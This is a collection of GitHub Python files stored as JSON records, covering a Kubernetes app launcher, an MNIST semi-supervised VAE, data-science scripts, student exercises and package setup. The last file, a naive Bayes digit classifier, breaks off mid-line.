initialize_logger(__name__)\n\nFORWARDED_URL = 'http://localhost:{}{}'\n\n\ndef is_gui_browser_available() -> bool:\n try:\n browser = webbrowser.get()\n return True if type(browser) not in {webbrowser.GenericBrowser, None} else False\n except webbrowser.Error:\n logger.exception('Failed to get webbrowser.')\n return False\n\n\ndef launch_app(k8s_app_name: NAUTAAppNames, no_launch: bool = False, port: int = None, app_name: str = None,\n number_of_retries: int = 0, url_end: str = \"\", namespace: str = None):\n try:\n with spinner(text=Texts.LAUNCHING_APP_MSG) as proxy_spinner, \\\n K8sProxy(nauta_app_name=k8s_app_name, port=port, app_name=app_name,\n number_of_retries=number_of_retries, namespace=namespace) as proxy:\n url = FORWARDED_URL.format(proxy.tunnel_port, url_end)\n\n if k8s_app_name == NAUTAAppNames.INGRESS:\n config.load_kube_config()\n user_token = configuration.Configuration().api_key.get('authorization')\n prepared_user_token = user_token.replace('Bearer ', '')\n url = f'{url}?token={prepared_user_token}'\n\n if not no_launch:\n\n if is_gui_browser_available():\n wait_for_connection(url)\n webbrowser.open_new(url)\n proxy_spinner.stop()\n else:\n click.echo(Texts.NO_WEB_BROWSER_ERROR_MSG)\n\n if port and port != proxy.tunnel_port:\n click.echo(Texts.CANNOT_USE_PORT.format(\n required_port=port,\n random_port=proxy.tunnel_port\n ))\n\n proxy_spinner.stop()\n click.echo(Texts.GO_TO_MSG.format(url=url))\n click.echo(Texts.PROXY_CREATED_MSG)\n wait_for_ctrl_c()\n except K8sProxyCloseError:\n err_message = Texts.PROXY_CLOSE_ERROR_MSG.format(app_name=k8s_app_name)\n raise ProxyClosingError(err_message)\n except LocalPortOccupiedError as exe:\n err_message = Texts.PROXY_CREATED_EXTENDED_ERROR_MSG.format(app_name=k8s_app_name, reason=exe.message)\n raise LaunchError(err_message)\n except K8sProxyOpenError:\n error_msg = Texts.PROXY_CREATED_ERROR_MSG.format(app_name=k8s_app_name)\n logger.exception(error_msg)\n raise LaunchError(error_msg)\n except LaunchError as e:\n raise e\n except Exception:\n err_message = Texts.WEB_APP_LAUCH_FAIL_MSG\n logger.exception(err_message)\n raise LaunchError(err_message)\n","repo_name":"IntelAI/nauta","sub_path":"applications/cli/util/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":393,"dataset":"github-code","pt":"67"} +{"seq_id":"1671164117","text":"from PIL import Image\nfrom os import walk\n\nsourcePath = \"C:/Users/joshu/Pictures/rpg/raw/\"\ndestinationPath = \"C:/Users/joshu/Pictures/rpg/stitched/\"\nimageSize = 3200\nmatrixSize = 4\ncanvasSize = imageSize * matrixSize\n\ndef main():\n canvas = Image.new(\"RGBA\", (canvasSize, canvasSize))\n fileNames = []\n # Load names of images\n for (_, __, filenames) in walk(sourcePath):\n fileNames.extend(filenames)\n break\n # Put everything into place\n for index in range(0, len(fileNames)):\n # Load image\n image = Image.open(sourcePath + fileNames[index])\n # Get it's position in the end result\n position = getPosition(fileNames[index])\n # Paste it into position\n canvas.paste(image, (position[1], position[0]))\n canvas.save(destinationPath + 'output-restitched.png')\n print('saved output')\n\ndef getPosition(name):\n # name is in the format of something_01_02.bmp\n # separate to something_01_02\n splitName = name.split(\".\")[0]\n # separate to [something, 01, 02]\n yposition = splitName.split(\"_\")[1]\n # separate 01 to just 1\n if yposition[0] == '0':\n yposition = yposition[1]\n xposition = 
splitName.split(\"_\")[2]\n # separate 02 to just 2\n if xposition[0] == '0':\n xposition = xposition[1]\n # convert to coordinates\n ycoordinate = (int(yposition) - 1) * imageSize\n xcoordinate = (int(xposition) - 1) * imageSize\n return [xcoordinate, ycoordinate]\n\n\n# Begin the program\nmain()","repo_name":"j-c-levin/roleplaying_city_map_stitcher","sub_path":"stich.py","file_name":"stich.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22043647850","text":"import collections\nimport itertools\nimport math\nimport re\n\ninp = open(re.search(r\"day\\d\\d\", __file__)[0] + 'input.txt').read().strip()\nVAL = {\n '0': 0,\n '1': 1,\n '2': 2,\n '-': -1,\n '=': -2,\n}\n\ntotal = 0\nfor line in inp.splitlines():\n p = 1\n num = 0\n for c in reversed(line):\n num += VAL[c] * p\n p *= 5\n total += num\n\nprint(total)\n\nREV = {\n 0: '0',\n 1: '1',\n 2: '2',\n 3: '1=',\n 4: '1-',\n -1: '-',\n -2: '=',\n}\nnums = []\npad = 0\nwhile total:\n n = REV[total % 5]\n nums.append(n + '0' * pad)\n pad += 1\n total = total // 5\n\ndef add(s1, s2):\n while len(s1) < len(s2):\n s1 = '0' + s1\n while len(s2) < len(s1):\n s2 = '0' + s2\n ans = ''\n for a, b in zip(s1, s2):\n ans += REV[VAL[a] + VAL[b]]\n return ans\n\nsnafu = '0'\nfor n in nums:\n snafu = add(snafu, n)\n\nprint(snafu)\n","repo_name":"idealisms/adventofcode","sub_path":"2022/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36458548227","text":"InfoDb = []\n\nInfoDb.append({ \n \"FirstName\": \"Evan\", \n \"LastName\": \"Sanchez\", \n \"DOB\": \"September 28\", \n \"Residence\": \"San Diego\", \n \"Email\": \"evans54795@stu.powayusd.com\", \n \"Owns_Cars\":[\"2018 Volt\"] \n }) \n\nInfoDb.append({ \n \"FirstName\": \"Hassan\", \n \"LastName\": \"Allam\", \n \"DOB\": \"May 5\", \n \"Residence\": \"San Diego\", \n \"Email\": \"hassana07646@stu.powayusd.com\", \n \"Owns_Cars\":[\"2011 Sonata\"] \n }) \n\ndef print_data(n):\n print(InfoDb[n][\"FirstName\"], InfoDb[n][\"LastName\"]) \n \n print(\"\\t\", \"Cars: \", end=\"\") \n \n print(\", \".join(InfoDb[n][\"Owns_Cars\"])) \n \n print()\n\n# Hack 2: InfoDB loops. 
Print values from the lists using three different ways: for, while, recursion\n\nfor i in InfoDb:\n print(i)\n## hack 2a: def for_loop()\ndef for_loop():\n # iterate over the index range and reuse print_data\n for n in range(len(InfoDb)):\n print_data(n)\n\n## hack 2b: def while_loop(0)\ndef while_loop(n):\n # loop while the index is still inside the list\n while n < len(InfoDb):\n print_data(n)\n n += 1\n\n## hack 2c : def recursive_loop(0)\ndef recursive_loop(n):\n # print record n, then recurse on the next index\n if n < len(InfoDb):\n print_data(n)\n recursive_loop(n + 1)\n\ndef tester():\n print(\"For loop\")\n for_loop()\n print(\"While loop\")\n while_loop(0) \n print(\"Recursive loop\")\n recursive_loop(0) ","repo_name":"deimie/CSP-individual","sub_path":"week1/infoDb.py","file_name":"infoDb.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19923734172","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 9 14:57:18 2019\n\n@author: Seko\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 9 13:53:06 2019\n\n@author: Erdo\n\"\"\"\n\n#%%\n\"\"\" SAY TRAINING A MODEL TOOK US A WHOLE WEEK.\n DO WE RETRAIN IT EVERY TIME WE OPEN IT AGAIN?\n NO, OF COURSE NOT: WE USE THE PICKLE LIBRARY:\n\"\"\"\n\"\"\"\nLet's see how to save and reload the XGBoost classifier from the previous example:\n\"\"\"\n\n#%%\n#%% \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#%%\ndata = pd.read_csv('Churn_Modelling.csv')\ndata.head()\n\n#%%\n# data preprocessing\nX= data.iloc[:,3:13].values\nY = data.iloc[:,13].values\n\n#%%\n#encoder: Categorical -> Numeric\nfrom sklearn.preprocessing import LabelEncoder\n\nle = LabelEncoder()\nX[:,1] = le.fit_transform(X[:,1])\n\nle2 = LabelEncoder()\nX[:,2] = le2.fit_transform(X[:,2])\n\nfrom sklearn.preprocessing import OneHotEncoder\nohe = OneHotEncoder(categorical_features=[1])\nX=ohe.fit_transform(X).toarray()\nX = X[:,1:]\n\n#%%\n# splitting the data into training and test sets\nfrom sklearn.model_selection import train_test_split\nx_train, x_test,y_train,y_test = train_test_split(X,Y,test_size=0.33, random_state=0)\n\n#%% \n\"\"\" XGBoost \"\"\"\nfrom xgboost import XGBClassifier\nclassifier = XGBClassifier()\nclassifier.fit(x_train, y_train) # After all, this is a classifier, so XGBoost is a classification algorithm.\n\ny_pred = classifier.predict(x_test)\n\n#%%\n\"\"\" SAVING THE MODEL \"\"\"\nimport pickle\n\ndosya = \"model.kayit\"\npickle.dump(classifier,open(dosya,'wb'))\n\n#%%\n\"\"\" LOADING THE MODEL BACK \"\"\"\nyuklenen = pickle.load(open(dosya,'rb'))\nprint(yuklenen.predict(x_test))\n\n\n\n\n\n","repo_name":"yildize/Basic-MachineLearning-Python","sub_path":"25. 
Modelin Kaydedilmesi ve Tekrar Çağırılması/ModelinKaydedilmesi.py","file_name":"ModelinKaydedilmesi.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74049282453","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(here, 'README.md')) as f:\n README = f.read()\nwith open(os.path.join(here, 'CHANGELOG.md')) as f:\n CHANGES = f.read()\n\ndev_requires = [\n 'pytest',\n 'pytest-cov',\n]\n\n\nsetup(\n author='Yaokai Yang',\n name='pyportscanner',\n version='0.3.2',\n description='Port Scanner for Python3+',\n long_description=README,\n long_description_content_type='text/markdown',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: Python\",\n \"Topic :: System :: Networking :: Monitoring\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n url='https://github.com/YaokaiYang-assaultmaster/py3PortScanner',\n packages=find_packages(),\n package_data={'pyportscanner': ['etc/*.dat']},\n include_package_data=True,\n zip_safe=False,\n extras_require={\n 'dev': dev_requires,\n },\n)\n","repo_name":"YaokaiYang-assaultmaster/py3PortScanner","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"67"} +{"seq_id":"985652731","text":"from typing import cast\n\nfrom fastapi import APIRouter\nfrom pydantic import BaseModel\n\nfrom .views.api import View\nfrom .views.viewsets import AsyncGenericViewSet, GenericViewSet\n\n\ndef register_view(router: APIRouter, view: type[View], prefix: str = \"\"):\n for route_params in view.get_api_actions(prefix):\n router.add_api_route(**route_params)\n\n\nclass ViewRouter(APIRouter):\n register_view = register_view\n\n\nclass CrudRouter(ViewRouter):\n def __init__(\n self,\n name: str,\n repository,\n pk: type[BaseModel],\n serializer,\n create_serializer=None,\n update_serializer=None,\n is_async: bool = True,\n **extra\n ):\n super().__init__(**extra)\n bases = (AsyncGenericViewSet,) if is_async else (GenericViewSet,)\n crud_viewset = cast(\n type[AsyncGenericViewSet],\n type(\n \"GenericCrudViewset\",\n bases,\n {\n \"pk\": pk,\n \"repository\": repository,\n \"serializer\": serializer,\n \"api_component_name\": name,\n \"create_serializer\": create_serializer,\n \"update_serializer\": update_serializer,\n },\n ),\n )\n register_view(self, crud_viewset)\n","repo_name":"performancemedia/fastapi-views","sub_path":"fastapi_views/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"44258816552","text":"import json\nimport dml\nimport prov.model\nimport datetime\nimport uuid\n\n# Set up the database connection.\nclient = dml.pymongo.MongoClient()\nrepo = client.repo\nrepo.authenticate('loyuichi', 'loyuichi')\n\n# Retrieve some 
data sets (not using the API here for the sake of simplicity).\nstartTime = datetime.datetime.now()\n\nmeters_per_mile = 1609.34\n\nres = repo['loyuichi.food_establishments'].drop_indexes()\nprint(res)\nres = repo['loyuichi.food_establishments'].create_index([('location_point', dml.pymongo.GEOSPHERE)], unique=False)\nprint(res)\n\nres = repo['loyuichi.meters'].drop_indexes()\nprint(res)\nres = repo['loyuichi.meters'].create_index([('location', dml.pymongo.GEOSPHERE)], unique=False)\nprint(res)\n\nres = repo['loyuichi.tickets'].drop_indexes()\nprint(res)\nres = repo['loyuichi.tickets'].create_index([('location_point', dml.pymongo.GEOSPHERE)], unique=False)\nprint(res)\n\n# res = repo['loyuichi.towed'].drop_indexes()\n# print(res)\n# res = repo['loyuichi.towed'].create_index([('location_point', pymongo.GEOSPHERE)], unique=False)\n# print(res)\n\ndata = []\nrepo.dropPermanent('fe_radius')\nrepo.createPermanent('fe_radius')\nfor fe in repo['loyuichi.food_establishments'].find():\n\tcoordinates = fe['location']['coordinates']\n\tmeters_count = repo['loyuichi.meters'].count({ 'location': { '$nearSphere': { '$geometry': { 'type': \"Point\", 'coordinates': coordinates }, '$maxDistance': 0.4 * meters_per_mile } } })\n\ttickets_count = repo['loyuichi.tickets'].count({ 'location_point': { '$nearSphere': { '$geometry': { 'type': \"Point\", 'coordinates': coordinates }, '$maxDistance': 0.4 * meters_per_mile } } })\n\t# towed_count = repo['loyuichi.towed'].count({ 'location_point': { '$nearSphere': { '$geometry': { 'type': \"Point\", 'coordinates': coordinates }, '$maxDistance': 0.7 * meters_per_mile } } })\n\tscore = meters_count + (-0.3*tickets_count)\n\tdata += [{'_id': fe['_id'], 'name': fe['businessname'], 'location_point': fe['location_point'], 'meters': meters_count, 'tickets': tickets_count, 'score': score}]\nrepo['loyuichi.fe_radius'].insert_many(data)\n\n\n#Outputting the results to a JSON file formatted for heatmap.html\ndata = []\nfor fe in repo['loyuichi.fe_radius'].find({}, {'_id': 0}):\n\tprint(fe)\n\tdata += [fe]\n\nwith open('fe_radius.json', 'w') as outfile:\n\tout = \"var food_establishments = \"\n\tout += json.dumps(data)\n\toutfile.write(out)\n\ndata = []\nfor m in repo['loyuichi.meters'].find({}, {'_id': 0, 'location': 1}):\n\tdata += [m]\n\nwith open('meters.json', 'w') as outfile:\n\tout = \"var meters = \"\n\tout += json.dumps(data)\n\toutfile.write(out)\n\n\n\n","repo_name":"data-mechanics/course-2016-spr-proj","sub_path":"loyuichi/count_nearby.py","file_name":"count_nearby.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"14430450200","text":"\"\"\"Reach the databases from the app\n\nThe function will be called so the app can reach the data (the events) in the databases\n\"\"\"\n\n\nimport MySQLdb\nfrom my_credentials import MyCredentials\n\n\ndef get_db_info():\n \"\"\"\n Reaches the db tables. Iterates through today's, future, and past events. 
For each event of each category,\n it looks up the corresponding venue and artist rows by their ids and appends them to one event info bundle (list).\n\n :return: one list containing three more lists: today's events, future events, and past events.\n :rtype: list\n \"\"\"\n\n db = MySQLdb.connect(MyCredentials.DB_URL,\n MyCredentials.USERNAME,\n MyCredentials.PASSWORD, 'findthebeat', charset='utf8', port=3306)\n\n cursor = db.cursor()\n\n events_today = []\n events_future = []\n events_past = []\n\n for date_status in ['today', 'future', 'past']:\n\n cursor.execute(f\"SELECT * FROM event WHERE event_date_status='{date_status}'\")\n\n for event_listing in list(cursor.fetchall()):\n\n event_info_bundle = list()\n event_info_bundle.append(list(event_listing)[4:])\n cursor.execute(\"SELECT artist_name, facebook_url FROM artist WHERE artist_id=%s\" % (event_listing[2]))\n event_info_bundle.append(list(cursor.fetchall()[0]))\n cursor.execute(\"\"\"\n SELECT venue_name, venue_url, venue_address FROM venue WHERE venue_id=%s\"\"\" % (event_listing[1]))\n event_info_bundle.append(list(cursor.fetchall()[0]))\n\n if date_status == 'today':\n events_today.append(event_info_bundle)\n\n elif date_status == 'future':\n events_future.append(event_info_bundle)\n\n elif date_status == 'past':\n events_past.append(event_info_bundle)\n\n db.close()\n\n return [events_today, events_future, events_past]\n","repo_name":"logiczsniper/Find-The-Beat","sub_path":"src/reach_db.py","file_name":"reach_db.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"1680390889","text":"from __future__ import print_function\nimport numpy as np\nfrom scipy.stats import norm\nimport torch\nimport torch.nn as nn\nfrom torch.nn import Parameter\nimport sys\nfrom torchvision import datasets, transforms\nimport os\nimport time\nfrom random import random\nsys.path.append('../')\nimport probtorch\nfrom probtorch.util import expand_inputs\nprint('probtorch:', probtorch.__version__,\n 'torch:', torch.__version__,\n 'cuda:', torch.cuda.is_available())\n\n# Model Parameters:\nNUM_PIXELS = 784\nNUM_HIDDEN1 = 400\nNUM_HIDDEN2 = 200\nNUM_STYLE = 10\nNUM_DIGITS = 10\n\n# Training Parameters:\nNUM_SAMPLES = 1\nNUM_BATCH = 128\nNUM_EPOCHS = 200\nLABEL_FRACTION = 0.1\nLEARNING_RATE = 1e-3\nEPS = 1e-9\nBIAS_TRAIN = (60000 - 1) / (NUM_BATCH - 1)\nBIAS_TEST = (10000 - 1) / (NUM_BATCH - 1)\nCUDA = torch.cuda.is_available()\n\n# LOSS parameters:\nALPHA = 0.1\nBETA = (4.0, 1.0, 1.0, 0.0, 1.0)\n\n# path parameters\nMODEL_NAME = 'mnist-semisupervised-inference-marginal-%02ddim' % NUM_STYLE\nDATA_PATH = 'data'\nIMAGES_PATH = 'images_semisupervised_inference_marginal'\nWEIGHTS_PATH = 'weights_semisupervised_inference_marginal'\nRESTORE = False\n\nclass Encoder(nn.Module):\n\n    def __init__(self, num_pixels=NUM_PIXELS,\n num_hidden1=NUM_HIDDEN1,\n num_hidden2=NUM_HIDDEN2,\n num_style=NUM_STYLE,\n num_digits=NUM_DIGITS):\n\n super(self.__class__, self).__init__()\n self.enc_hidden = nn.Sequential(\n nn.Linear(num_pixels, num_hidden1),\n nn.ReLU())\n self.digit_log_weights = nn.Linear(num_hidden1, num_digits)\n self.digit_temp = 0.66\n self.style_mean = nn.Sequential(\n nn.Linear(num_hidden1 + num_digits, num_hidden2),\n nn.ReLU(),\n nn.Linear(num_hidden2, num_style))\n self.style_log_std = nn.Sequential(\n nn.Linear(num_hidden1 + num_digits, num_hidden2),\n nn.ReLU(),\n nn.Linear(num_hidden2, num_style))\n\n @expand_inputs\n def forward(self, images, labels=None, 
num_samples=NUM_SAMPLES):\n q = probtorch.Trace()\n hidden = self.enc_hidden(images)\n digits = q.concrete(logits=self.digit_log_weights(hidden),\n temperature=self.digit_temp,\n value=labels,\n name='y')\n hidden2 = torch.cat([digits, hidden], -1)\n styles_mean = self.style_mean(hidden2)\n styles_std = self.style_log_std(hidden2).exp()\n q.normal(loc=styles_mean,\n scale=styles_std,\n name='z')\n return q\n\ndef binary_cross_entropy(x_mean, x, EPS=1e-9):\n return - (torch.log(x_mean + EPS) * x +\n torch.log(1 - x_mean + EPS) * (1 - x)).sum(-1)\n\nclass Decoder(nn.Module):\n def __init__(self, num_pixels=NUM_PIXELS,\n num_hidden1=NUM_HIDDEN1,\n num_hidden2=NUM_HIDDEN2,\n num_style=NUM_STYLE,\n num_digits=NUM_DIGITS):\n\n super(self.__class__, self).__init__()\n self.dec_hidden = nn.Sequential(\n nn.Linear(num_style + num_digits, num_hidden2),\n nn.ReLU(),\n nn.Linear(num_hidden2, num_hidden1),\n nn.ReLU())\n\n self.num_style = num_style\n self.num_digits = num_digits\n self.digit_temp = 0.66\n self.dec_images = nn.Sequential(\n nn.Linear(num_hidden1, num_pixels),\n nn.Sigmoid())\n\n def forward(self, images, q=None, num_samples=NUM_SAMPLES, batch_size=NUM_BATCH):\n p = probtorch.Trace()\n digit_log_weights = torch.zeros(num_samples, batch_size, self.num_digits)\n style_mean = torch.zeros(num_samples, batch_size, self.num_style)\n style_std = torch.ones(num_samples, batch_size, self.num_style)\n\n if CUDA:\n digit_log_weights = digit_log_weights.cuda()\n style_mean = style_mean.cuda()\n style_std = style_std.cuda()\n\n digits = p.concrete(logits=digit_log_weights,\n temperature=self.digit_temp,\n value=q['y'],\n name='y')\n\n styles = p.normal(loc=style_mean,\n scale=style_std,\n value=q['z'],\n name='z')\n\n hiddens = self.dec_hidden(torch.cat([digits, styles], -1))\n images_mean = self.dec_images(hiddens)\n p.loss(binary_cross_entropy, images_mean, images, name='images')\n return p\n\ndef elbo(q, p, alpha=ALPHA, beta=BETA, bias=1.0):\n return probtorch.objectives.marginal.elbo(q, p, sample_dim=0, batch_dim=1,\n alpha=alpha, beta=beta, bias=bias)\n\nif not os.path.isdir(DATA_PATH):\n os.makedirs(DATA_PATH)\n\ntrain_data = torch.utils.data.DataLoader(\n datasets.MNIST(DATA_PATH, train=True, download=True,\n transform=transforms.ToTensor()),\n batch_size=NUM_BATCH, shuffle=True)\ntest_data = torch.utils.data.DataLoader(\n datasets.MNIST(DATA_PATH, train=False, download=True,\n transform=transforms.ToTensor()),\n batch_size=NUM_BATCH, shuffle=True)\n\nenc = Encoder()\ndec = Decoder()\nif CUDA:\n enc.cuda()\n dec.cuda()\noptimizer = torch.optim.Adam(list(enc.parameters())+list(dec.parameters()),\n lr=LEARNING_RATE)\n\ndef train(data, enc, dec, optimizer,\n label_mask={}, label_fraction=LABEL_FRACTION):\n epoch_elbo = 0.0\n enc.train()\n dec.train()\n N = 0\n for b, (images, labels) in enumerate(data):\n if images.size(0) == NUM_BATCH:\n N += NUM_BATCH\n images = images.view(-1, NUM_PIXELS)\n labels_onehot = torch.zeros(NUM_BATCH, NUM_DIGITS)\n labels_onehot.scatter_(1, labels.unsqueeze(1), 1)\n labels_onehot = torch.clamp(labels_onehot, EPS, 1-EPS)\n if CUDA:\n images = images.cuda()\n labels_onehot = labels_onehot.cuda()\n optimizer.zero_grad()\n if b not in label_mask:\n label_mask[b] = (random() < label_fraction)\n if label_mask[b]:\n q = enc(images, labels_onehot, num_samples=NUM_SAMPLES)\n else:\n q = enc(images, num_samples=NUM_SAMPLES)\n p = dec(images, q, num_samples=NUM_SAMPLES, batch_size=NUM_BATCH)\n loss = -elbo(q, p, bias=BIAS_TRAIN)\n loss.backward()\n 
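# loss is the negative ELBO, so the optimizer step below maximizes the ELBO\n # jointly over the encoder and decoder parameters.\n 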
optimizer.step()\n if CUDA:\n loss = loss.cpu()\n epoch_elbo -= loss.item()\n return epoch_elbo / N, label_mask\n\n\ndef test(data, enc, dec, infer=True):\n enc.eval()\n dec.eval()\n epoch_elbo = 0.0\n epoch_correct = 0\n N = 0\n for b, (images, labels) in enumerate(data):\n if images.size()[0] == NUM_BATCH:\n N += NUM_BATCH\n images = images.view(-1, NUM_PIXELS)\n if CUDA:\n images = images.cuda()\n q = enc(images, num_samples=NUM_SAMPLES)\n p = dec(images, q, num_samples=NUM_SAMPLES, batch_size=NUM_BATCH)\n batch_elbo = elbo(q, p, bias=BIAS_TEST)\n if CUDA:\n batch_elbo = batch_elbo.cpu()\n epoch_elbo += batch_elbo.data.numpy()\n\n log_p = p.log_joint(0, 1)\n log_q = q.log_joint(0, 1)\n log_w = log_p - log_q\n w = torch.nn.functional.softmax(log_w, 0)\n y_samples = q['y'].value\n y_expect = (w.unsqueeze(-1) * y_samples).sum(0)\n _ , y_pred = y_expect.data.max(-1)\n if CUDA:\n y_pred = y_pred.cpu()\n epoch_correct += (labels == y_pred).float().sum()\n return epoch_elbo / N, epoch_correct / N\n\nif not RESTORE:\n mask = {}\n for e in range(NUM_EPOCHS):\n train_start = time.time()\n train_elbo, mask = train(train_data, enc, dec,\n optimizer, mask, LABEL_FRACTION)\n train_end = time.time()\n test_start = time.time()\n test_elbo, test_accuracy = test(test_data, enc, dec)\n test_end = time.time()\n\n print('[Epoch %d] Train: ELBO %.4e (%ds) Test: ELBO %.4e, Accuracy %0.3f (%ds)' % (\n e, train_elbo, train_end - train_start,\n test_elbo, test_accuracy, test_end - test_start))\n f = open(\"ouput_semisupervised_iwae.txt\",\"a\")\n f.write('[Epoch %d] Train: ELBO %.4e (%ds) Test: ELBO %.4e, Accuracy %0.3f (%ds)\\n' % (\n e, train_elbo, train_end - train_start,\n test_elbo, test_accuracy, test_end - test_start))\n f.close()\n if not os.path.isdir(WEIGHTS_PATH):\n os.mkdir(WEIGHTS_PATH)\n torch.save(enc.state_dict(),\n '%s/%s-%s-%s-enc.rar' % (WEIGHTS_PATH, MODEL_NAME, probtorch.__version__, torch.__version__))\n torch.save(dec.state_dict(),\n '%s/%s-%s-%s-dec.rar' % (WEIGHTS_PATH, MODEL_NAME, probtorch.__version__, torch.__version__))\n","repo_name":"cs771mlproject/Learning-Disentangled-Representation","sub_path":"mnist-semisupervised-inference-marginal.py","file_name":"mnist-semisupervised-inference-marginal.py","file_ext":"py","file_size_in_byte":9362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19010498069","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport scipy.io\nimport math\nimport geneNewData\n\ndef calculate_features(data):\n num_samples, height, width = data.shape\n features = np.zeros((num_samples, 2)) # Create an array to store the calculated features\n \n for i in range(num_samples):\n image = data[i]\n brightness_values = image.reshape(-1) # Flatten the 2D image array into a 1D array\n average_brightness = np.mean(brightness_values)\n std_dev_brightness = np.std(brightness_values)\n \n features[i, 0] = average_brightness\n features[i, 1] = std_dev_brightness\n \n return features\n\ndef calculate_parameters(data):\n feature1_mean = np.mean(data[:, 0])\n feature1_variance = np.var(data[:, 0])\n feature2_mean = np.mean(data[:, 1])\n feature2_variance = np.var(data[:, 1])\n \n return feature1_mean, feature1_variance, feature2_mean, feature2_variance\n\ndef calculate_naive_bayes_probability(feature, mean, variance):\n exponent = -((feature - mean) ** 2) / (2 * variance)\n probability = np.exp(exponent) / (np.sqrt(2 * np.pi * variance))\n return probability\n\ndef classify_data(data, 
params_digit0, params_digit1):\n predictions = []\n \n for i in range(data.shape[0]):\n feature1 = data[i, 0]\n feature2 = data[i, 1]\n \n prob_feature1_digit0 = calculate_naive_bayes_probability(feature1, params_digit0[0], params_digit0[1])\n prob_feature2_digit0 = calculate_naive_bayes_probability(feature2, params_digit0[2], params_digit0[3])\n prob_digit0 = prob_feature1_digit0 * prob_feature2_digit0\n \n prob_feature1_digit1 = calculate_naive_bayes_probability(feature1, params_digit1[0], params_digit1[1])\n prob_feature2_digit1 = calculate_naive_bayes_probability(feature2, params_digit1[2], params_digit1[3])\n prob_digit1 = prob_feature1_digit1 * prob_feature2_digit1\n \n if prob_digit0 > prob_digit1:\n predictions.append(0)\n else:\n predictions.append(1)\n \n return predictions\n\ndef calculate_accuracy(predictions, actual_labels):\n correct_predictions = np.sum(predictions == actual_labels)\n total_predictions = len(predictions)\n accuracy = correct_predictions / total_predictions * 100\n return accuracy\n\ndef check_within_range(value, target, tolerance):\n lower_bound = target - tolerance\n upper_bound = target + tolerance\n return lower_bound <= value <= upper_bound\n\ndef main():\n myID = '1284' # your ID here\n geneNewData.geneData(myID)\n Numpyfile0 = scipy.io.loadmat('digit0_stu_train'+myID)\n Numpyfile1 = scipy.io.loadmat('digit1_stu_train'+myID)\n Numpyfile2 = scipy.io.loadmat('digit0_testset')\n Numpyfile3 = scipy.io.loadmat('digit1_testset')\n\n train0 = Numpyfile0.get('target_img')\n train1 = Numpyfile1.get('target_img')\n test0 = Numpyfile2.get('target_img')\n test1 = Numpyfile3.get('target_img')\n \n # Task 1\n # Calculate features for digit \"0\" training set\n features_train0 = calculate_features(train0)\n # Calculate features for digit \"1\" training set\n features_train1 = calculate_features(train1)\n\n # Task 2\n # Calculate parameters for digit \"0\" based on the generated features\n feature0_params = calculate_parameters(features_train0)\n # Calculate parameters for digit \"1\" based on the generated features\n feature1_params = calculate_parameters(features_train1)\n # Unpack the calculated parameters\n mean_feature1_digit0, variance_feature1_digit0, mean_feature2_digit0, variance_feature2_digit0 = feature0_params\n mean_feature1_digit1, variance_feature1_digit1, mean_feature2_digit1, variance_feature2_digit1 = feature1_params\n print(\"mean_feature1_digit0\", mean_feature1_digit0)\n print(\"variance_feature1_digit0\", variance_feature1_digit0)\n print(\"mean_feature2_digit0\", mean_feature2_digit0)\n print(\"variance_feature2_digit0\", variance_feature2_digit0)\n print(\"mean_feature1_digit1\", mean_feature1_digit1)\n print(\"variance_feature1_digit1\", variance_feature1_digit1)\n print(\"mean_feature2_digit1\", mean_feature2_digit1)\n print(\"variance_feature2_digit1\", variance_feature2_digit1)\n\n # Task 3\n # Convert the original test data arrays to 2-D data points\n features_test0 = calculate_features(test0)\n features_test1 = calculate_features(test1)\n # Classify the test data points for digit \"0\" and \"1\" using the calculated parameters\n predictions_test0 = classify_data(features_test0, feature0_params, feature1_params)\n predictions_test1 = classify_data(features_test1, feature0_params, feature1_params)\n print(\"predictions_test0\", predictions_test0)\n print(\"predictions_test1\", predictions_test1)\n\n # Task 4\n actual_labels_test0 = np.zeros(len(test0)) # Actual labels for digit \"0\"\n actual_labels_test1 = np.ones(len(test1)) # Actual 
